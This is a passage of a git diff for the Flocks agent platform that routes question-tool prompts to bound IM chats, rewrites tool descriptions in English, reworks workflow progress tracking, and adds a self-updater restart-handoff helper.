+            return None  # no bindings: caller proceeds with its regular question handler
+
+        text = _format_channel_question_text(questions)
+        for binding in bindings:  # the same text is delivered to every bound chat
+            await OutboundDelivery.deliver(
+                OutboundContext(
+                    channel_id=binding.channel_id,
+                    account_id=binding.account_id,
+                    to=binding.chat_id,
+                    text=text,
+                    thread_id=binding.thread_id,
+                ),
+                session_id=binding.session_id,
+            )
+
+        return ToolResult(
+            success=True,
+            output=(
+                "Question sent to the IM channel as plain text. "
+                "Do not continue the dependent action until the user replies in a new message."
+            ),
+            title="Question sent to channel",
+            metadata={
+                "deferred": True,  # no answer is collected within this call
+                "channel_session": True,
+                "bindings": [
+                    {
+                        "channel_id": b.channel_id,
+                        "chat_type": b.chat_type.value if b.chat_type else None,
+                        "chat_id": b.chat_id,
+                        "session_id": b.session_id,
+                    }
+                    for b in bindings
+                ],
+            },
+        )
+    except Exception as e:  # covers the imports, the binding lookup, and every delivery
+        log.warning("question.channel_send_failed", {
+            "session_id": ctx.session_id,
+            "error": str(e),
+        })
+        return ToolResult(
+            success=False,
+            error=f"Failed to send question to channel: {e}",
+        )
+
+
 async def default_question_handler(
     session_id: str,
     questions: List[Dict[str, Any]]
@@ -177,6 +307,13 @@ async def default_question_handler(
                             "type": "boolean",
                             "description": "For 'choice' type: allow selecting multiple options",
                         },
+                        "custom": {
+                            "type": "boolean",
+                            "description": (
+                                "For 'choice' type: allow a custom Other answer option. "
+                                "Defaults to true."
+                            ),
+                        },
                         "placeholder": {
                             "type": "string",
                             "description": "Placeholder/hint text for text, number, password, file inputs",
@@ -241,6 +378,7 @@ async def question_tool(
             "type": q.get("type", "choice"),
             "options": [],
             "multiple": q.get("multiple", False),
+            "custom": q.get("custom", True),
             "placeholder": q.get("placeholder", ""),
             "multiline": q.get("multiline", False),
         }
@@ -256,16 +394,12 @@ async def question_tool(
 
         options = q.get("options", [])
         for opt in options:
-            if isinstance(opt, dict):
-                normalized["options"].append({
-                    "label": str(opt.get("label", "")),
-                    "description": opt.get("description", "")
-                })
-            elif isinstance(opt, str):
-                normalized["options"].append({
-                    "label": opt,
-                    "description": ""
-                })
+            option = normalize_question_option(opt)
+            if option is not None:
+                normalized["options"].append(option)
+
+        if normalized["type"] == "choice" and not normalized["options"]:
+            normalized["type"] = "text"
         
         normalized_questions.append(normalized)
     
@@ -274,6 +408,10 @@ async def question_tool(
             success=False,
             error="No valid questions provided"
         )
+
+    channel_result = await _send_channel_question_if_applicable(ctx, normalized_questions)
+    if channel_result is not None:
+        return channel_result
     
     # Get handler
     handler = _question_handler or default_question_handler
@@ -298,6 +436,21 @@ def format_answer(answer: Optional[List[str]]) -> str:
         ])
         
         output = f"User has answered your questions: {formatted}. You can now continue with the user's answers in mind."
+        try:
+            from flocks.session.goal import GoalManager
+
+            await GoalManager.record_initial_clarification(
+                ctx.session_id,
+                normalized_questions,
+                answers,
+                message_id=ctx.message_id,
+                call_id=ctx.call_id,
+            )
+        except Exception as e:
+            log.warn("question.goal_clarification_record_failed", {
+                "session_id": ctx.session_id,
+                "error": str(e),
+            })
         
         return ToolResult(
             success=True,
diff --git a/flocks/tool/system/session_manage.py b/flocks/tool/system/session_manage.py
index 771a30280..7bf2968d2 100644
--- a/flocks/tool/system/session_manage.py
+++ b/flocks/tool/system/session_manage.py
@@ -25,15 +25,25 @@
 SESSION_MANAGE_ACTIONS = ["list", "get", "create", "update", "delete", "archive"]
 
 SESSION_MANAGE_DESCRIPTION = """\
-管理 Flocks Session 元数据。
+Manage Flocks Session metadata.
+
+Use this tool when the user wants to list, inspect, create, rename, update,
+delete, archive, or restore a Flocks session. Also use it when the user asks to
+change/switch/update the model or provider used by a session.
 
 Use `action` to choose the operation:
-- list: 列出 session；可用 project_id/status/category/limit/offset 过滤或分页
-- get: 获取单个 session；需要 session_id
-- create: 创建 session；可传 title/project_id/directory/agent/parent_id
-- update: 更新 session；需要 session_id，可传 title/agent/model/provider/memory_enabled
-- delete: 软删除 session 及其子 session；需要 session_id，会请求确认
-- archive: 归档或取消归档 session；需要 session_id，archive=false 表示恢复 active
+- list: list sessions; filter or paginate with project_id/status/category/limit/offset.
+  If the target session_id is unknown, call list first.
+- get: get one session; requires session_id.
+- create: create a session; supports title/project_id/directory/agent/parent_id.
+- update: update session metadata; requires session_id. Supports title, agent,
+  model, provider, and memory_enabled. For requests like "change this session to
+  gpt-5" or "update the session model", use action=update with model, and set
+  provider too when the user specifies one.
+- delete: soft-delete a session and its child sessions; requires session_id and
+  confirmation.
+- archive: archive or restore a session; requires session_id. Set archive=false
+  to restore an archived session to active.
 """
 
 
@@ -43,7 +53,10 @@
         type=ParameterType.STRING,
         required=True,
         enum=SESSION_MANAGE_ACTIONS,
-        description="要执行的 session 操作：list/get/create/update/delete/archive",
+        description=(
+            "Session operation: list/get/create/update/delete/archive. Use update "
+            "to change a session's title, agent, model, provider, or memory setting."
+        ),
     ),
     ToolParameter(
         name="session_id",
@@ -99,7 +112,7 @@
         name="agent",
         type=ParameterType.STRING,
         required=False,
-        description="create/update 的 agent 类型",
+        description="Agent type for create/update.",
     ),
     ToolParameter(
         name="parent_id",
@@ -111,13 +124,19 @@
         name="model",
         type=ParameterType.STRING,
         required=False,
-        description="update 的 model ID",
+        description=(
+            "Model ID to set during update, for example when the user asks to "
+            "change/switch/update the model used by a session."
+        ),
     ),
     ToolParameter(
         name="provider",
         type=ParameterType.STRING,
         required=False,
-        description="update 的 provider ID",
+        description=(
+            "Provider ID to set during update, for example openai/anthropic/local. "
+            "Use with model when the target model's provider is specified or known."
+        ),
     ),
     ToolParameter(
         name="memory_enabled",
@@ -140,6 +159,7 @@
     description=SESSION_MANAGE_DESCRIPTION,
     category=ToolCategory.SYSTEM,
     parameters=SESSION_MANAGE_PARAMETERS,
+    native=True,
 )
 async def session_manage(
     ctx: ToolContext,
diff --git a/flocks/tool/task/run_workflow.py b/flocks/tool/task/run_workflow.py
index c4588a89c..4c9c27bdd 100644
--- a/flocks/tool/task/run_workflow.py
+++ b/flocks/tool/task/run_workflow.py
@@ -21,10 +21,13 @@
 from flocks.session.recorder import Recorder
 from flocks.workflow.execution_store import (
     compact_history_for_storage,
+    compact_execution_summary,
     compact_outputs_for_storage,
     compact_step_for_storage,
     create_execution_record,
+    derive_loop_progress,
     normalize_execution_status,
+    record_execution_step,
     record_execution_result,
     resolve_execution_outcome,
     workflow_execution_key,
@@ -34,6 +37,8 @@
 
 log = Log.create(service="tool.run_workflow")
 
+_PROGRESS_FLUSH_EVERY_STEPS = 5
+
 # Lazy import to avoid circular import (flocks.tool <-> flocks.workflow)
 _WORKFLOW_AVAILABLE: Optional[bool] = None
 RequirementsInstaller = None
@@ -499,8 +504,10 @@ async def run_workflow_tool(
     canonical_workflow_id = resolve_workflow_id_from_source(workflow_source)
     display_workflow_id = canonical_workflow_id or workflow_id
     tracked_execution: Optional[Dict[str, Any]] = None
-    tracked_history: list[Dict[str, Any]] = []
+    tracked_step_count = 0
     tracked_exec_key: Optional[str] = None
+    pending_step_index: Optional[int] = None
+    pending_step: Optional[Dict[str, Any]] = None
     loop = asyncio.get_running_loop()
 
     def _emit_metadata(metadata: Dict[str, Any]) -> None:
@@ -510,13 +517,11 @@ def _update_execution_progress(update_fields: Dict[str, Any]) -> None:
         if not tracked_exec_key:
             return
         try:
-            current = asyncio.run_coroutine_threadsafe(
-                Storage.read(tracked_exec_key),
-                loop,
-            ).result(timeout=5)
-            current.update(update_fields)
+            if tracked_execution is None:
+                return
+            tracked_execution.update(update_fields)
             asyncio.run_coroutine_threadsafe(
-                Storage.write(tracked_exec_key, current),
+                Storage.write(tracked_exec_key, compact_execution_summary(tracked_execution)),
                 loop,
             ).result(timeout=5)
         except Exception as exc:
@@ -532,14 +537,32 @@ def _on_step_start(
         node: Any,
         _inputs: Dict[str, Any],
     ) -> int:
+        nonlocal pending_step_index, pending_step
         current_node_id = getattr(node, "id", None)
         current_node_type = getattr(node, "type", None)
-        _update_execution_progress({
-            "currentNodeId": current_node_id,
-            "currentNodeType": current_node_type,
-            "currentPhase": "running",
-            "currentStepIndex": step_index,
-        })
+        loop_progress = derive_loop_progress(
+            node_id=current_node_id,
+            global_step_index=step_index,
+            inputs=_inputs,
+            outputs=None,
+        )
+        pending_step_index = step_index
+        pending_step = {
+            "node_id": current_node_id,
+            "node_type": current_node_type,
+            "inputs": _inputs if isinstance(_inputs, dict) else {},
+            "outputs": {},
+            "error": "Run cancelled before node completed",
+        }
+        if tracked_execution is not None:
+            tracked_execution.update({
+                "currentNodeId": current_node_id,
+                "currentNodeType": current_node_type,
+                "currentPhase": "running",
+                "currentStepIndex": step_index,
+                "loopProgress": loop_progress,
+                "updatedAt": int(time.time() * 1000),
+            })
         _emit_metadata({
             "title": f"Running workflow: {workflow_name}",
             "metadata": {
@@ -553,25 +576,63 @@ def _on_step_start(
                 "current_node_id": current_node_id,
                 "current_node_type": current_node_type,
                 "step_index": step_index,
+                "loop_progress": loop_progress,
             },
         })
         return step_index
 
     def _on_step_complete(step_result: Any) -> None:
+        nonlocal tracked_step_count, pending_step_index, pending_step
         if hasattr(step_result, "model_dump"):
             step_dict = step_result.model_dump(mode="json")
         elif isinstance(step_result, dict):
             step_dict = dict(step_result)
         else:
             step_dict = {"node_id": None, "outputs": {}, "error": str(step_result)}
-        tracked_history.append(compact_step_for_storage(step_dict))
-        _update_execution_progress({
-            "executionLog": list(tracked_history),
-            "currentNodeId": step_dict.get("node_id"),
-            "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
-            "currentPhase": "running",
-            "currentStepIndex": len(tracked_history),
-        })
+        step_index = tracked_step_count + 1
+        compacted_step = compact_step_for_storage(step_dict)
+        pending_step_index = None
+        pending_step = None
+        loop_progress = derive_loop_progress(
+            node_id=step_dict.get("node_id"),
+            global_step_index=step_index,
+            inputs=step_dict.get("inputs"),
+            outputs=step_dict.get("outputs"),
+        )
+        tracked_step_count = step_index
+        if tracked_execution is not None:
+            tracked_execution.update({
+                "stepCount": tracked_step_count,
+                "currentNodeId": step_dict.get("node_id"),
+                "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
+                "currentPhase": "running",
+                "currentStepIndex": tracked_step_count,
+                "loopProgress": loop_progress,
+                "updatedAt": int(time.time() * 1000),
+            })
+        if tracked_execution is not None:
+            try:
+                asyncio.run_coroutine_threadsafe(
+                    record_execution_step(tracked_execution["id"], step_index, compacted_step),
+                    loop,
+                ).result(timeout=5)
+            except Exception as exc:
+                log.warning("run_workflow.execution_step.write_failed", {
+                    "workflow_id": display_workflow_id,
+                    "exec_id": tracked_execution["id"],
+                    "step_index": step_index,
+                    "error": str(exc),
+                })
+        if tracked_step_count % _PROGRESS_FLUSH_EVERY_STEPS == 0:
+            _update_execution_progress({
+                "stepCount": tracked_step_count,
+                "currentNodeId": step_dict.get("node_id"),
+                "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
+                "currentPhase": "running",
+                "currentStepIndex": tracked_step_count,
+                "loopProgress": loop_progress,
+                "updatedAt": int(time.time() * 1000),
+            })
         _emit_metadata({
             "title": f"Running workflow: {workflow_name}",
             "metadata": {
@@ -583,10 +644,33 @@ def _on_step_complete(step_result: Any) -> None:
                 "phase": "running",
                 "current_node_id": step_dict.get("node_id"),
                 "current_node_type": step_dict.get("node_type") or step_dict.get("type"),
-                "step_index": len(tracked_history),
-                "completed_steps": len(tracked_history),
+                "step_index": tracked_step_count,
+                "step_count": tracked_step_count,
+                "loop_progress": loop_progress,
             },
         })
+        return
+
+    async def _flush_pending_step() -> None:
+        """Persist the step that was started but has not completed (best effort)."""
+        required = (tracked_execution, pending_step_index, pending_step)
+        if any(value is None for value in required):
+            # No tracked execution or no in-flight step: nothing to record.
+            return
+        # Write the placeholder captured at step start under its step index.
+        try:
+            await record_execution_step(
+                tracked_execution["id"], pending_step_index, pending_step
+            )
+        except Exception as exc:
+            # A failed write is only logged; the exception is not re-raised.
+            failure = {
+                "workflow_id": display_workflow_id,
+                "exec_id": tracked_execution["id"],
+                "step_index": pending_step_index,
+                "error": str(exc),
+            }
+            log.warning("run_workflow.pending_step.write_failed", failure)
     
     await ctx.ask(
         permission="run_workflow",
@@ -716,8 +800,17 @@ def _on_step_complete(step_result: Any) -> None:
         await _record_workflow_tool_result(display_workflow_id, result_dict)
 
         status_value = normalize_execution_status(status)
+        compacted_history = compact_history_for_storage(result_dict.get("history"))
+        history_count = len(compacted_history)
+        if status_value == "cancelled" and not compacted_history:
+            await _flush_pending_step()
+        final_step_count = result_dict.get("steps")
+        if not isinstance(final_step_count, int):
+            final_step_count = tracked_step_count
+        if pending_step_index is not None:
+            final_step_count = max(final_step_count, pending_step_index)
         if tracked_execution and canonical_workflow_id and tracked_exec_key:
-            current_data = await Storage.read(tracked_exec_key)
+            current_data = dict(tracked_execution)
             outcome_result = result
             if not hasattr(outcome_result, "status"):
                 outcome_result = SimpleNamespace(
@@ -731,11 +824,13 @@ def _on_step_complete(step_result: Any) -> None:
                 "status": status_value,
                 "finishedAt": int(time.time() * 1000),
                 "duration": time.time() - execution_started_at,
-                "executionLog": compact_history_for_storage(result_dict.get("history")) or list(tracked_history),
+                "executionLog": compacted_history,
+                "stepCount": final_step_count,
                 "errorMessage": error_message,
                 "currentNodeId": result_dict.get("last_node_id"),
                 "currentPhase": status_value,
-                "currentStepIndex": result_dict.get("steps", len(tracked_history)),
+                "currentStepIndex": final_step_count,
+                "updatedAt": int(time.time() * 1000),
             })
             await record_execution_result(
                 canonical_workflow_id,
@@ -753,12 +848,13 @@ def _on_step_complete(step_result: Any) -> None:
                     "status": status_value,
                     "phase": status_value,
                     "current_node_id": result_dict.get("last_node_id"),
-                    "step_index": result_dict.get("steps", len(tracked_history)),
+                    "step_index": final_step_count,
+                    "step_count": final_step_count,
+                    "loop_progress": current_data.get("loopProgress"),
                 },
             })
 
         compacted_outputs = compact_outputs_for_storage(result_dict.get("outputs"))
-        compacted_history = compact_history_for_storage(result_dict.get("history"))
 
         # If workflow failed, include error in ToolResult
         if not success and error:
@@ -777,7 +873,8 @@ def _on_step_complete(step_result: Any) -> None:
                     "run_id": result_dict.get("run_id"),
                     "last_node_id": result_dict.get("last_node_id"),
                     "outputs": compacted_outputs,
-                    "history": compacted_history,
+                    "history": [],
+                    "history_count": history_count,
                 }
             )
         
@@ -795,7 +892,8 @@ def _on_step_complete(step_result: Any) -> None:
                 "run_id": result_dict.get("run_id"),
                 "last_node_id": result_dict.get("last_node_id"),
                 "outputs": compacted_outputs,
-                "history": compacted_history,
+                "history": [],
+                "history_count": history_count,
             }
         )
         
@@ -806,14 +904,16 @@ def _on_step_complete(step_result: Any) -> None:
             "error": error_msg,
         })
         if tracked_execution and canonical_workflow_id and tracked_exec_key:
-            current_data = await Storage.read(tracked_exec_key)
+            current_data = dict(tracked_execution)
             current_data.update({
                 "status": "error",
                 "finishedAt": int(time.time() * 1000),
                 "errorMessage": error_msg,
-                "executionLog": compact_history_for_storage(list(tracked_history)),
+                "executionLog": [],
+                "stepCount": tracked_step_count,
                 "currentPhase": "error",
-                "currentStepIndex": len(tracked_history),
+                "currentStepIndex": tracked_step_count,
+                "updatedAt": int(time.time() * 1000),
             })
             await record_execution_result(
                 canonical_workflow_id,
@@ -829,7 +929,7 @@ def _on_step_complete(step_result: Any) -> None:
                     "workflow_execution_id": tracked_execution["id"],
                     "status": "error",
                     "phase": "error",
-                    "step_index": len(tracked_history),
+                    "step_index": tracked_step_count,
                 },
             })
         
diff --git a/flocks/tool/task/schedule_task_center.py b/flocks/tool/task/schedule_task_center.py
index b8d179f4a..ec2a3ab14 100644
--- a/flocks/tool/task/schedule_task_center.py
+++ b/flocks/tool/task/schedule_task_center.py
@@ -129,9 +129,11 @@ def _normalize_schedule_task_create_inputs(
         "Queue-only (use type=queued, no schedule): "
         "'等会', '稍后', '待会', '有空时', '不着急'\n\n"
         "IMPORTANT — IM session resolution before creating:\n"
-        "If the task involves sending a message to an IM platform (企业微信/WeCom、飞书/Feishu、钉钉/DingTalk), "
-        "you MUST resolve the target session_id and channel_type BEFORE calling this tool "
-        "(follow the IM Session Resolution for schedule_task_create protocol in your system prompt). "
+        "If the task involves sending a message to an IM platform "
+        "(企业微信/WeCom、微信/Weixin/WeChat、飞书/Feishu、钉钉/DingTalk), "
+        "you MUST resolve the target session_id and channel_type with im_send_message(resolve_only=true) "
+        "BEFORE calling this tool. "
+        "Use channel_type=wecom for 企业微信 and channel_type=weixin for 微信. "
         "Embed both into description and user_prompt. "
         "If the user cannot provide a session_id, do NOT create the task."
     ),
@@ -148,8 +150,9 @@ def _normalize_schedule_task_create_inputs(
             type=ParameterType.STRING,
             description=(
                 "Detailed task description. "
-                "If the task involves sending a message to an IM platform (WeCom/Feishu/DingTalk), "
+                "If the task involves sending a message to an IM platform (WeCom/Weixin/Feishu/DingTalk), "
                 "MUST include the resolved channel_type and session_id here. "
+                "Use channel_type=wecom for 企业微信 and channel_type=weixin for 微信. "
                 "Example: '每天早上8点向飞书群发送日报 channel_type=feishu session_id=ses_abc123'"
             ),
             required=True,
@@ -257,8 +260,9 @@ def _normalize_schedule_task_create_inputs(
                 "Example — user says: '帮我加个任务，明天上午扫描一下内网资产' "
                 "→ user_prompt should be: '扫描内网资产' "
                 "CRITICAL — IM tasks: If the action involves sending a message to an IM platform "
-                "(WeCom/Feishu/DingTalk), you MUST include the resolved channel_type and session_id "
+                "(WeCom/Weixin/Feishu/DingTalk), you MUST include the resolved channel_type and session_id "
                 "in user_prompt. NEVER omit them — the task runs unattended and cannot ask the user. "
+                "Use channel_type=wecom for 企业微信 and channel_type=weixin for 微信. "
                 "Example — user says: '每天8点发飞书消息给研发群' (session already resolved to ses_abc123) "
                 "→ user_prompt should be: '向飞书(channel_type=feishu) session_id=ses_abc123 发送消息：<消息内容>' "
                 "This text is displayed in the UI as '任务补充信息'."
diff --git a/flocks/updater/restart_handoff.py b/flocks/updater/restart_handoff.py
new file mode 100644
index 000000000..f6350b400
--- /dev/null
+++ b/flocks/updater/restart_handoff.py
@@ -0,0 +1,246 @@
+"""Restart handoff helper for the self-updater.
+
+The updater process owns the backend port while it is spawning the restart
+command. Starting the new backend before that process has fully exited can race
+with port release. This helper is spawned instead; it waits for the old backend
+to exit, clears any remaining backend listener, runs post-apply upgrade tasks,
+and then starts the real restart command.
+"""
+
+from __future__ import annotations
+
+import argparse
+import asyncio
+import shutil
+import subprocess
+import time
+from pathlib import Path
+from typing import Sequence
+
+from flocks.cli import service_manager
+from flocks.utils.log import append_upgrade_text_log
+
+DEFAULT_PARENT_TIMEOUT_SECONDS = 20.0
+DEFAULT_PORT_TIMEOUT_SECONDS = 10.0
+POST_STOP_PORT_TIMEOUT_SECONDS = 20.0
+DEFAULT_POLL_INTERVAL_SECONDS = 0.25
+
+
+class _NullConsole:
+    def print(self, *args, **kwargs) -> None:
+        """Accept any arguments and discard them; always returns ``None``."""
+
+
+def _record_handoff_log(message: str) -> None:
+    append_upgrade_text_log(f"restart_handoff {message}")  # every entry is prefixed with "restart_handoff "
+
+
+def _wait_for_parent_exit(
+    parent_pid: int,
+    *,
+    timeout_seconds: float = DEFAULT_PARENT_TIMEOUT_SECONDS,  # total time budget for the wait
+    poll_interval_seconds: float = DEFAULT_POLL_INTERVAL_SECONDS,  # pause between liveness checks
+) -> bool:
+    deadline = time.monotonic() + timeout_seconds  # monotonic clock: unaffected by wall-clock adjustments
+    while time.monotonic() < deadline:
+        if not service_manager.pid_is_running(parent_pid):
+            return True  # parent is no longer running
+        time.sleep(poll_interval_seconds)
+    return not service_manager.pid_is_running(parent_pid)  # one final check after the budget is spent
+
+
+def _backend_port_in_use(port: int) -> bool:
+    """Ask ``service_manager`` whether ``port`` is in use, passing it the port's owner PIDs."""
+    return service_manager.port_is_in_use(port, service_manager.port_owner_pids(port))
+
+
+def _wait_for_backend_port_free(
+    port: int,
+    *,
+    timeout_seconds: float = DEFAULT_PORT_TIMEOUT_SECONDS,  # total time budget for the wait
+    poll_interval_seconds: float = DEFAULT_POLL_INTERVAL_SECONDS,  # pause between port checks
+) -> bool:
+    deadline = time.monotonic() + timeout_seconds  # monotonic clock: unaffected by wall-clock adjustments
+    while time.monotonic() < deadline:
+        if not _backend_port_in_use(port):
+            return True  # port is free
+        time.sleep(poll_interval_seconds)
+    return not _backend_port_in_use(port)  # one final check after the budget is spent
+
+
+def _ensure_backend_port_free(backend_port: int, backend_pid_file: Path) -> bool:
+    """Wait for the backend port to clear, stopping the backend through service_manager if it does not."""
+    freed = _wait_for_backend_port_free(backend_port)
+    if not freed:
+        _record_handoff_log(f"backend_port_still_in_use port={backend_port}; stopping backend")
+        try:
+            service_manager.stop_one(backend_port, backend_pid_file, "backend", _NullConsole())
+        except Exception as exc:
+            _record_handoff_log(f"backend_stop_failed port={backend_port} error={exc}")
+            return False
+        freed = _wait_for_backend_port_free(backend_port, timeout_seconds=POST_STOP_PORT_TIMEOUT_SECONDS)
+    return freed
+
+
+def _cli_subcommand(argv: Sequence[str]) -> str | None:
+    """Return the token that follows ``-m flocks.cli.main`` in ``argv``, or ``None`` if absent."""
+    triples = zip(argv, argv[1:], argv[2:])
+    matches = (sub for flag, module, sub in triples if (flag, module) == ("-m", "flocks.cli.main"))
+    return next(matches, None)
+
+
+def _record_backend_runtime_if_direct_serve(
+    process: subprocess.Popen,
+    restart_argv: Sequence[str],
+    *,
+    backend_host: str,
+    backend_port: int,
+    backend_pid_file: Path,
+) -> None:
+    """Write a runtime record for ``process`` when the restart command invokes ``serve`` directly.
+
+    Errors while building or writing the record are logged and not re-raised.
+    """
+    # Any other subcommand returns without writing a record.
+    if _cli_subcommand(restart_argv) != "serve":
+        return
+
+    try:
+        record = service_manager.process_runtime_record(
+            process, host=backend_host, port=backend_port, command=restart_argv
+        )
+        service_manager.write_runtime_record(backend_pid_file, record)
+    except Exception as exc:
+        _record_handoff_log(f"backend_runtime_record_failed error={exc}")
+
+
+def _parse_args(argv: Sequence[str] | None = None) -> argparse.Namespace:
+    parser = argparse.ArgumentParser(description="Flocks restart handoff helper")
+    parser.add_argument("--parent-pid", type=int, required=True)  # PID that run() waits on before proceeding
+    parser.add_argument("--backend-host", required=True)
+    parser.add_argument("--backend-port", type=int, required=True)
+    parser.add_argument("--frontend-host", required=True)
+    parser.add_argument("--frontend-port", type=int, required=True)
+    parser.add_argument("--backend-pid-file", required=True)
+    parser.add_argument("--install-root", required=True)
+    parser.add_argument("--uv-path", required=True)
+    parser.add_argument("--sync-timeout", type=int, required=True)
+    parser.add_argument("--version", required=True)
+    parser.add_argument("--current-version", required=True)
+    parser.add_argument("--backup-path")  # this and the options below are optional and default to None
+    parser.add_argument("--uv-default-index")
+    parser.add_argument("--npm-registry")
+    parser.add_argument("--pro-wheel-path")
+    parser.add_argument("--pro-bundle-manifest-path")
+    parser.add_argument("--bundle-sha256")
+    parser.add_argument("--cleanup-dir")
+    parser.add_argument("restart_argv", nargs=argparse.REMAINDER)  # all remaining tokens form the restart command
+    args = parser.parse_args(argv)
+    if args.restart_argv and args.restart_argv[0] == "--":  # drop a leading "--" separator if one was passed
+        args.restart_argv = args.restart_argv[1:]
+    return args
+
+
+def _run_upgrade_tasks(args: argparse.Namespace) -> str | None:
+    """Run the updater's handoff upgrade coroutine to completion and return its result."""
+    from flocks.updater import updater
+
+    wheel = Path(args.pro_wheel_path) if args.pro_wheel_path else None
+    manifest = Path(args.pro_bundle_manifest_path) if args.pro_bundle_manifest_path else None
+    upgrade = updater.run_handoff_upgrade_tasks(
+        install_root=Path(args.install_root),
+        uv_path=args.uv_path,
+        version=args.version,
+        uv_default_index=args.uv_default_index,
+        npm_registry=args.npm_registry,
+        pro_wheel_path=wheel,
+        pro_bundle_manifest_path=manifest,
+        bundle_sha256=args.bundle_sha256,
+        sync_timeout=args.sync_timeout,
+    )
+    return asyncio.run(upgrade)
+
+
+def _rollback_failed_upgrade(args: argparse.Namespace, error: str) -> None:
+    """Log the upgrade failure, then ask the updater to roll back; rollback errors are only logged."""
+    from flocks.updater import updater
+
+    _record_handoff_log(f"upgrade_tasks_failed error={error}")
+    # A missing or empty --backup-path is forwarded to the rollback as None.
+    backup = Path(args.backup_path) if args.backup_path else None
+    try:
+        updater._rollback_failed_update(
+            backup, Path(args.install_root), args.current_version
+        )
+    except Exception as exc:
+        _record_handoff_log(f"rollback_failed error={exc}")
+
+
+def _cleanup_dir(path_value: str | None) -> None:
+    """Recursively delete ``path_value`` when one was given; removal errors are ignored."""
+    if path_value:
+        shutil.rmtree(Path(path_value), ignore_errors=True)
+
+
+def run(argv: Sequence[str] | None = None) -> int:
+    args = _parse_args(argv)
+    restart_argv = list(args.restart_argv)
+    if not restart_argv:
+        _record_handoff_log("missing_restart_argv")
+        return 2  # distinct status: no restart command was supplied
+
+    _record_handoff_log(
+        "started "
+        f"parent_pid={args.parent_pid} backend={args.backend_host}:{args.backend_port} "
+        f"frontend={args.frontend_host}:{args.frontend_port}"
+    )
+
+    if not _wait_for_parent_exit(args.parent_pid):  # step 1: the parent process must exit first
+        _record_handoff_log(f"parent_exit_timeout parent_pid={args.parent_pid}")
+        _cleanup_dir(args.cleanup_dir)
+        return 1
+
+    backend_pid_file = Path(args.backend_pid_file)
+    if not _ensure_backend_port_free(args.backend_port, backend_pid_file):  # step 2: backend port must be free
+        _record_handoff_log(f"backend_port_unavailable port={args.backend_port}")
+        _cleanup_dir(args.cleanup_dir)
+        return 1
+
+    try:
+        task_error = _run_upgrade_tasks(args)  # step 3: post-apply upgrade work; returns an error text or None
+    except Exception as exc:
+        task_error = f"upgrade tasks crashed: {exc}"  # fold unexpected exceptions into the same error path
+    if task_error is not None:
+        _rollback_failed_upgrade(args, task_error)
+        _cleanup_dir(args.cleanup_dir)
+        return 1  # NOTE(review): returns after rollback without launching restart_argv — confirm intended
+
+    try:
+        process = subprocess.Popen(  # step 4: launch the real restart command; it is not waited on
+            restart_argv,
+            cwd=Path(args.install_root),
+            close_fds=True,
+        )
+    except OSError as exc:
+        _record_handoff_log(f"restart_spawn_failed error={exc}")
+        _cleanup_dir(args.cleanup_dir)
+        return 1
+
+    _record_backend_runtime_if_direct_serve(  # only writes a record when the command is a direct "serve"
+        process,
+        restart_argv,
+        backend_host=args.backend_host,
+        backend_port=args.backend_port,
+        backend_pid_file=backend_pid_file,
+    )
+    _record_handoff_log(f"restart_spawned pid={process.pid}")
+    _cleanup_dir(args.cleanup_dir)
+    return 0
+
+
+def main() -> None:
+    raise SystemExit(run())  # run()'s integer result becomes the process exit status
+
+
+if __name__ == "__main__":
+    main()
diff --git a/flocks/updater/updater.py b/flocks/updater/updater.py
index 2196dc974..51d9dcda9 100644
--- a/flocks/updater/updater.py
+++ b/flocks/updater/updater.py
@@ -13,6 +13,7 @@
 """
 
 import asyncio
+import contextlib
 import importlib.util
 import json
 import os
@@ -55,6 +56,7 @@
 _FRONTEND_BUILD_TIMEOUT_SECONDS = 300
 _DEPENDENCY_SYNC_TIMEOUT_SECONDS = 180
 _WINDOWS_DEPENDENCY_SYNC_TIMEOUT_SECONDS = 300
+_CANCELLATION_RETRY_DELAY_SECONDS = 0.1
 
 _PRESERVE_NAMES: set[str] = {
     ".venv",
@@ -294,63 +296,21 @@ def _get_repo_root() -> Path:
     return Path(__file__).parent.parent.parent
 
 
-def _windows_upgrade_python_path(install_root: Path) -> Path:
-    """Return the Windows project virtualenv interpreter for upgrade restarts."""
-    return install_root / ".venv" / "Scripts" / "python.exe"
+def _upgrade_python_path(install_root: Path) -> Path:
+    """Locate the interpreter inside ``install_root/.venv`` for the current platform."""
+    venv_dir = install_root / ".venv"
+    is_windows = sys.platform == "win32"
+    return venv_dir / "Scripts" / "python.exe" if is_windows else venv_dir / "bin" / "python"
 
 
-async def _validate_windows_restart_runtime(
+async def _validate_restart_runtime(
     install_root: Path,
-    *,
-    max_attempts: int = 2,
-    timeout: int = 60,
-    retry_delay: float = 3.0,
 ) -> str | None:
-    """Validate the Windows project runtime that will be used for restart.
-
-    Retries up to *max_attempts* times to tolerate transient delays caused by
-    antivirus scanning or filesystem cache warm-up after ``uv sync``.
-    """
-    python_exe = _windows_upgrade_python_path(install_root)
+    """Validate that the project runtime path exists for restart."""
+    python_exe = _upgrade_python_path(install_root)
     if not python_exe.exists():
-        return f"Windows restart runtime is missing: {python_exe}"
-
-    last_error: str = ""
-    for attempt in range(max_attempts):
-        try:
-            code, _, err = await _run_async(
-                [str(python_exe), "-c", "import flocks; import uvicorn"],
-                cwd=install_root,
-                timeout=timeout,
-            )
-        except subprocess.TimeoutExpired:
-            last_error = (
-                f"Validation timed out ({timeout}s) — "
-                "antivirus or filesystem cache may still be warming up."
-            )
-            log.warning(
-                "updater.validate_runtime.timeout",
-                {"attempt": attempt + 1, "timeout": timeout},
-            )
-        except Exception as exc:
-            last_error = str(exc)
-            log.warning(
-                "updater.validate_runtime.error",
-                {"attempt": attempt + 1, "error": last_error},
-            )
-        else:
-            if code == 0:
-                return None
-            last_error = err or "unknown error"
-            log.warning(
-                "updater.validate_runtime.nonzero",
-                {"attempt": attempt + 1, "code": code, "error": last_error},
-            )
-
-        if attempt < max_attempts - 1:
-            await asyncio.sleep(retry_delay)
-
-    return f"Windows restart runtime validation failed: {last_error}"
+        return f"Restart runtime is missing: {python_exe}"
+    return None
 
 
 def _build_uv_sync_env() -> dict[str, str] | None:
@@ -561,6 +521,8 @@ async def _await_ignoring_cancellation(awaitable):
             return await asyncio.shield(task)
         except asyncio.CancelledError:
             log.warning("updater.restart.critical_step_cancelled_ignored")
+            with contextlib.suppress(asyncio.CancelledError):
+                await asyncio.sleep(_CANCELLATION_RETRY_DELAY_SECONDS)
 
 
 def _dependency_sync_timeout_seconds() -> int:
